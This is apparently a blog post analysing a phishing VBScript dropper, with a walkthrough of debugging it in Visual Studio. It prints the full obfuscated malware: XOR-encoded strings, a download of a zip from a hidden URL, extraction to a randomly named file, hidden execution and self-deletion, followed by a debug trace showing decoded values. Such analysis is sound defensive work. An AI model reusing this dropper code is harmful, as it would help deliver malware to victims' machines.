There was a phishing email that came in the other day that looked interesting. When I went to the URL found in the PDF, it linked to an ARJ archive file. Once i downloaded this file and extracted it, I saw that there was a VBScript file. Opening this file gave me the following code (also available at my Github located here).
Dim strChaveCript
Dim arrFileCaixa
Dim strLinkCaixaCompactada
Dim XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip
Dim strPathLocalCaixa
Dim strPathLocalFinalCaixa
Dim strNomeArquivoCaixaZip
Dim strNomeArquivoModuloBTC
Dim strPathArquivoModuloBTC
Dim objFileSystemObject
Dim objVarWHSWindowsShell
Dim strPathArquivoLog
Dim strArquivoLogComplemento
Dim objShelApplication
Dim objArquivosNaCaixaZip
Dim objFileZipedNaCaixaZip
Dim objHttpParaDownload
Dim objStreamArquivoDownload
Dim strLinhaComandoAddRegistro
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
End IF
Dim intCryptFuncKeyLength
Dim intCryptFuncKeyPosition
Dim intCryptFuncOffSet
Dim strCryptFuncResult
Dim intCryptFuncSourcePosition
Dim intCryptFuncSourceAscii
Dim intCryptFuncTempSourceAscii
intCryptFuncKeyLength = Len(strChaveCript)
intCryptFuncKeyPosition = 0
intCryptFuncOffSet = 0
strCryptFuncResult = ""
intCryptFuncSourcePosition = 0
intCryptFuncSourceAscii = 0
intCryptFuncTempSourceAscii = 0
intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
Else
intCryptFuncKeyPosition = 1
------ End If
intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
IF (intCryptFuncTempSourceAscii <= intCryptFuncOffSet) Then
intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
Else
intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
End If
strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
intCryptFuncOffSet = intCryptFuncSourceAscii
Next
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
End Function
Function GerarStringRandomica(ByVal intParamTamanhoGeraString)
Dim strRetornoStringGerada
Dim intTamanhoMinGeraString
Dim intTamanhoMaxGeraString
Dim intContador
Dim CONSTSTRINGGERASTRINGLETRAS
CONSTSTRINGGERASTRINGLETRAS = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("4Bff262A5fcb7e96b953fe182d2C4ad663f232D14fD47984AC3fd851D856E82cA04b81BB4CDD30DF79a757fb080213DE26F9319B79c5A5b0B384EB6bF41D19")
intTamanhoMinGeraString = 1
intTamanhoMaxGeraString = Len(CONSTSTRINGGERASTRINGLETRAS)
Randomize
For intContador = 1 to intParamTamanhoGeraString
strRetornoStringGerada = strRetornoStringGerada & _
Mid( CONSTSTRINGGERASTRINGLETRAS, _
Int((intTamanhoMaxGeraString - _
intTamanhoMinGeraString + 1) * _
Rnd + intTamanhoMinGeraString), 1 )
Next
GerarStringRandomica = strRetornoStringGerada
End Function
strChaveCript = "sdC1olSgPcRIV0ODFwTipRTp9AkkjRb2C2QjjzB7OO3fyeV"
set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("FA2110309393688fda7E85B86C8E"))
Set objFileSystemObject = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("B778bf71eb33CB66B34b1a32d269fe1dD200033Cc06090AE64fe32"))
strPathLocalCaixa = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("EF66bf70e438c464B44Bd71632016dAE50fb1B23")
strPathLocalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalCaixa)
If Not objFileSystemObject.FolderExists(strPathLocalCaixa) Then
objFileSystemObject.CreateFolder strPathLocalCaixa
End If
strPathArquivoLog = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("64FA14C41bE23FE235cb5690bcB724D779a06696")
strPathArquivoLog = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathArquivoLog)
strArquivoLogComplemento = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("8E92a29bcf6FCE69B843F37Ea2a33f22e41fFB38")
strPathArquivoLog = strPathArquivoLog & strArquivoLogComplemento
set objVarWHSWindowsShell = Nothing
If objFileSystemObject.FileExists(strPathArquivoLog) Then
objFileSystemObject.DeleteFile Wscript.ScriptFullName, True
Else
objFileSystemObject.CreateTextFile(strPathArquivoLog)
strLinkCaixaCompactada = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("31EA3BEC6cB086E6718597A85792C779a95Ffa30F72e0e24E62fdd26E12ec558b5BF28291B3EEC1c49ee2EBB72D25Cf230FD6fd82Df1")
set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("F43fF619BA4bD71f2a2Df60e33c9"))
strPathLocalFinalCaixa = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("A3BB558Bc15ba749df161cda0978E4")
strPathLocalFinalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalFinalCaixa)
strPathLocalFinalCaixa = strPathLocalFinalCaixa & _
GerarStringRandomica(9) & _
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("6FB8")
objFileSystemObject.CreateFolder strPathLocalFinalCaixa
set objVarWHSWindowsShell = Nothing
strNomeArquivoCaixaZip = GerarStringRandomica(9)
strNomeArquivoCaixaZip = strNomeArquivoCaixaZip & rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("9Ebf5e84c5")
XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip = strPathLocalCaixa & strNomeArquivoCaixaZip
strNomeArquivoModuloBTC = GerarStringRandomica(7)
strPathArquivoModuloBTC = strPathLocalFinalCaixa & _
strNomeArquivoModuloBTC & _
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("1637F832A6")
Set objHttpParaDownload = createobject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("DB5Aa7488B9565878Aaebf4aDE7DF5051D2b"))
Set objStreamArquivoDownload = createobject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("380A2a3A4FFE41C75B9D609348"))
objHttpParaDownload.Open rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("8EA68FA0"), strLinkCaixaCompactada, False
objHttpParaDownload.Send
objStreamArquivoDownload.type = 1
objStreamArquivoDownload.open
objStreamArquivoDownload.write objHttpParaDownload.responseBody
objStreamArquivoDownload.savetofile XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip, 2
Set objStreamArquivoDownload = Nothing
Set objHttpParaDownload = Nothing
Set objShelApplication = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("70b07DA13Fc49e8C9B5Cab47E313b76e994e"))
Set objArquivosNaCaixaZip = objShelApplication.NameSpace(XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip).Items()
objShelApplication.NameSpace(strPathLocalCaixa).CopyHere(objArquivosNaCaixaZip)
For Each objFileZipedNaCaixaZip in objArquivosNaCaixaZip
objFileSystemObject.MoveFile strPathLocalCaixa & objFileZipedNaCaixaZip.Name, strPathArquivoModuloBTC
Next
objFileSystemObject.DeleteFile XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip, True
Set objShelApplication = Nothing
Set objArquivosNaCaixaZip = Nothing
Set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("EC37ee11b2738f57e266AD41e407"))
objVarWHSWindowsShell.run """" & strPathArquivoModuloBTC & """", 0, False
objFileSystemObject.DeleteFile Wscript.ScriptFullName, True
Set objVarWHSWindowsShell = Nothing
Set objFileSystemObject = Nothing
End If
As you can see, this looks pretty complex (and just confusing to be honest). Manually trying to walk through this code was somewhat confusing since 1) the variable names were all over the language place (some are Italian, Portuguese, and Spanish) 2) there is a missing start to a function (in the code there is a lone “end function” call), and 3) I was not sure where exactly this script started. After a while of trying to manually step through this by hand, I figured that there would have to be a better way. Looking around I came across this article from ESET talking about how to debug VBScript using Visual Studio which I had never even though about using to be honest. For more information about that, see this link. The way that I did it was different than how they did theirs, but still good to know.
Once Visual Studio was installed on my VM, I opened the file and walked through some areas setting breakpoints as seen below. This will allow me to step through the script and watch how the script operates.
From here, I started up Visual Studio’s “Developer Command Prompt” and called the script using Wscript along with the arguments of “//X //D” as seen below.
Once I ran that command, I got prompted for which debug session to use. I choose the existing instance of Visual Studio with the script with breakpoints.
NOTE: If you get the following screen, I just choose to reload it. The breakpoints should all keep.
From here, you can see the breakpoints that have been setup. Since I have ran a debug session against the script already, you can also see the variables that I was watching as well. This will come in handy especially when dealing with how the script gets built out.
At this time you are ready to walk through the script. Use F11 to “Step Into” the code. From here, you can see how this script gets created and the variables populated.
And below is the code cleaned up after stepping through the script in Visual Studio. Overall the script looks to be creating an array and filling in the required variables bit by bit. It is also using XOR for the obfuscation as well. Once the script is built out, it then deletes the VBScript file and ends. When running this script in my VM, I get an unhandled exception call and all activities cease at that time.
strChaveCript = "sdC1olSgPcRIV0ODFwTipRTp9AkkjRb2C2QjjzB7OO3fyeV"
set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("FA2110309393688fda7E85B86C8E"))
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
intCryptFuncKeyLength = Len(strChaveCript)
intCryptFuncKeyPosition = 0
intCryptFuncOffSet = 0
strCryptFuncResult = ""
intCryptFuncSourcePosition = 0
intCryptFuncSourceAscii = 0
intCryptFuncTempSourceAscii = 0
intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
Else
intCryptFuncKeyPosition = 1
End If
intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
IF (intCryptFuncTempSourceAscii <= intCryptFuncOffSet) Then
intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
Else
intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
End If
strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
intCryptFuncOffSet = intCryptFuncSourceAscii
Next
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
End Function
################### --- strCryptFuncResult / rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z == wscript.shell --- ###################
Set objFileSystemObject = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("B778bf71eb33CB66B34b1a32d269fe1dD200033Cc06090AE64fe32"))
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
intCryptFuncKeyLength = Len(strChaveCript)
intCryptFuncKeyPosition = 0
intCryptFuncOffSet = 0
strCryptFuncResult = ""
intCryptFuncSourcePosition = 0
intCryptFuncSourceAscii = 0
intCryptFuncTempSourceAscii = 0
intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
Else
intCryptFuncKeyPosition = 1
End If
intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
IF (intCryptFuncTempSourceAscii <= intCryptFuncOffSet) Then
intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
Else
intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
End If
strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
intCryptFuncOffSet = intCryptFuncSourceAscii
Next
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
End Function
################### --- strCryptFuncResult / rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z == scripting.filesystemobject --- ###################
strPathLocalCaixa = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("EF66bf70e438c464B44Bd71632016dAE50fb1B23")
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
intCryptFuncKeyLength = Len(strChaveCript)
intCryptFuncKeyPosition = 0
intCryptFuncOffSet = 0
strCryptFuncResult = ""
intCryptFuncSourcePosition = 0
intCryptFuncSourceAscii = 0
intCryptFuncTempSourceAscii = 0
intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
Else
intCryptFuncKeyPosition = 1
End If
intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
IF (intCryptFuncTempSourceAscii <= intCryptFuncOffSet) Then
intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
Else
intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
End If
strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
intCryptFuncOffSet = intCryptFuncSourceAscii
Next
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
End Function
################### --- strCryptFuncResult / rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z == %userprofile%\\temp\\ --- ###################
strPathLocalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalCaixa)
If Not objFileSystemObject.FolderExists(strPathLocalCaixa) Then
objFileSystemObject.CreateFolder strPathLocalCaixa
End If
strPathArquivoLog = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("64FA14C41bE23FE235cb5690bcB724D779a06696")
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
intCryptFuncKeyLength = Len(strChaveCript)
intCryptFuncKeyPosition = 0
intCryptFuncOffSet = 0
strCryptFuncResult = ""
intCryptFuncSourcePosition = 0
intCryptFuncSourceAscii = 0
intCryptFuncTempSourceAscii = 0
intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
Else
intCryptFuncKeyPosition = 1
End If
intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
IF (intCryptFuncTempSourceAscii <= intCryptFuncOffSet) Then
intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
Else
intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
End If
strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
intCryptFuncOffSet = intCryptFuncSourceAscii
Next
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult ----------> %userprofile%\\temp\\
End Function
strPathArquivoLog = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathArquivoLog)
strArquivoLogComplemento = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("8E92a29bcf6FCE69B843F37Ea2a33f22e41fFB38")
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
strPathLocalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalCaixa)
If Not objFileSystemObject.FolderExists(strPathLocalCaixa) Then
objFileSystemObject.CreateFolder strPathLocalCaixa
End If
strPathArquivoLog = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("64FA14C41bE23FE235cb5690bcB724D779a06696")
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
intCryptFuncKeyLength = Len(strChaveCript)
intCryptFuncKeyPosition = 0
intCryptFuncOffSet = 0
strCryptFuncResult = ""
intCryptFuncSourcePosition = 0
intCryptFuncSourceAscii = 0
intCryptFuncTempSourceAscii = 0
intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
Else
intCryptFuncKeyPosition = 1
End If
intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
IF (intCryptFuncTempSourceAscii <= intCryptFuncOffSet) Then
intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
Else
intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
End If
strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
intCryptFuncOffSet = intCryptFuncSourceAscii
Next
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult ----------> S46c03kvZM8mSk.~tmp
End Function
strPathArquivoLog = strPathArquivoLog & strArquivoLogComplemento ----------> C:\\Users\\Bill\temp\\S46c03kvZM8mSk.~tmp
set objVarWHSWindowsShell = Nothing
If objFileSystemObject.FileExists(strPathArquivoLog) Then
objFileSystemObject.DeleteFile Wscript.ScriptFullName, True
***End of debug session***